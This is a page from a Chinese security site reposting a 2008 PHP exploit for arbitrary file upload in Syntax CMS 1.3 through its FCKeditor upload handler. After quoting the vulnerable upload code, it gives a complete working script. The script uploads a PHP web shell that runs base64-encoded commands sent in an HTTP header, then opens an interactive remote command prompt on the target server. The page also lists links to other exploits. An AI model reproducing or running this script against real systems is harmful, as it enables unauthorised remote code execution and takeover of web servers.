首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit
来源:www.vfcocus.net 作者:Stack 发布时间:2008-05-30  
<?php
/*
--------------------------------------------------------------
Syntax CMS <=  1.3 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------

Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For the Exploit Code

author...: Stack
mail.....: Ev!L
descr:
        if the web site change the name of path or path is /public/  you can delet /public/ in the exploit
        in the line :
        "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php
[-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php

41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63.  SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl  = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76.  $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80.  // Compose the file path.
81.  $sFilePath = $sServerDir . $sFileName ;
82.
83.  // If a file with that name already exists.
84.  if ( is_file( $sFilePath ) )
85.  {
86.   $iCounter++ ;
87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88.   $sErrorNumber = '201' ;
89.  }
90.  else
91.  {
92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94.   if ( is_file( $sFilePath ) )
95.   {
96.    $oldumask = umask(0) ;
97.    chmod( $sFilePath, 0777 ) ;
98.    umask( $oldumask ) ;
99.   }
100.  
101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103.   break ;

with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
  print "\n[-] No response from {$host}:80 Trying again...";
  $sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n| Syntax CMS <=  1.3 Arbitrary File Upload Exploit by Stack  |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /Syntax/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data  = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet  = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
  $packet.= "Host: {$host}\r\n";
  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
  $packet.= "Connection: close\r\n\r\n";
  $output = http_send($host, $packet);
  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
  $shell = explode("_code_", $output);
  print "\n{$shell[1]}";
}
else break;
}
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VMware Server Console ActiveX
·CMS from Scratch <= 1.1.3 (fck
·CA Internet Security Suite 200
·Mambo Component mambads <= 1.
·Creative Software AutoUpdate E
·ASUS DPC Proxy 2.0.0.16/19 Rem
·PHP 5.2.6 sleep() Local Memory
·Now SMS/MMS Gateway 5.5 Remote
·RevokeBB 1.0 RC11 (search) Rem
·PHP Booking Calendar 10 d (fck
·80sec发现的phpwind注册漏洞
·RoomPHPlanning 1.5 Arbitrary A
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved